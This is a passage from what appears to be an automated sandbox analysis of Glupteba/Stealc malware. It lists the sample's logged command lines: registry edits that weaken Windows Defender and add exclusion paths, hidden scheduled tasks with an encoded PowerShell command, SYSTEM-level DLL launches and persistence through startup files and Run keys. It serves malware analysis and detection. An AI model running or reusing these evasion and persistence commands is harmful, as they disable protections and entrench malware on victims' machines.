REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gDVVmaqMc" /SC once /ST 01:51:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gDVVmaqMc"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gDVVmaqMc"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 01:17:40 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe\" XT /dEsite_idNZT 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe XT /dEsite_idNZT 385118 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\vAeHwP.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\WUGGbkD.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qbSDwEgyNYPZlGA"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\YCfxMSe.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\AvKHovV.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\rYBRMvB.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\aQbGfpM.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 12:41:20 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\ViKQsLpw\WxIZUPa.dll\",#1 /LHsite_idkmI 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "QhciBzJOokLnyYZub"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\ViKQsLpw\WxIZUPa.dll",#1 /LHsite_idkmI 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\ViKQsLpw\WxIZUPa.dll",#1 /LHsite_idkmI 385118
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"
Network
Files
| SHA1 | c386b95d64a15f1f4a3c6906446556d303713940 |
| SHA256 | 8ed96ba8583756f2527ef70bff78cb9bf2afb7d7c1a5214e321feeef245522a7 |
| SHA512 | 5e4a05added9a614dcc0b89ecc96e0bdcb33ef8ab5a66a4a096eaf697efae201f22de9f6c5f65a2fe7239f995670ab5d7e00fd6556a48b7a2eb9f2d4e830f9cc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 7d47ee664a4e49a2e157c928bdceef3e |
| SHA1 | aca2efcbd04ab7cffd04e31228d3192692f7b82b |
| SHA256 | 7ccee053dc9cbc1b6537c0eba8f93e448566c6ba347fb8cb31e6a58a35aa3f4f |
| SHA512 | f56992cfcb5caf9567623b8451ebaeeaa2f0790ac1fe30f0b1509033ac934f72f7ebbc8e573e3bdce5e2d38ee99a8f89a6658cba7da5d6243aa9b0302476f31f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-19 14:04
Reported
2024-04-19 14:07
Platform
win11-20240412-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
Stealc
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vLxMkquwj2YLyeMbPWIrM04m.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lma0w8jNTTBEKB4j2ImfhlKl.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BJcupLuUarzm5XXQzG6ujYry.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9XtibT4Yf4gH04TbrqAhIOG1.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e3y42iPJ08drhXOmj3ez4uBU.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BwNhJ3ZI8lFiFlan3IJP72hk.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iLLA17oZmuYEQ42ykMCFYANl.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4vHWCNg1n0gUuFSrnQ517HiF.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe | N/A |
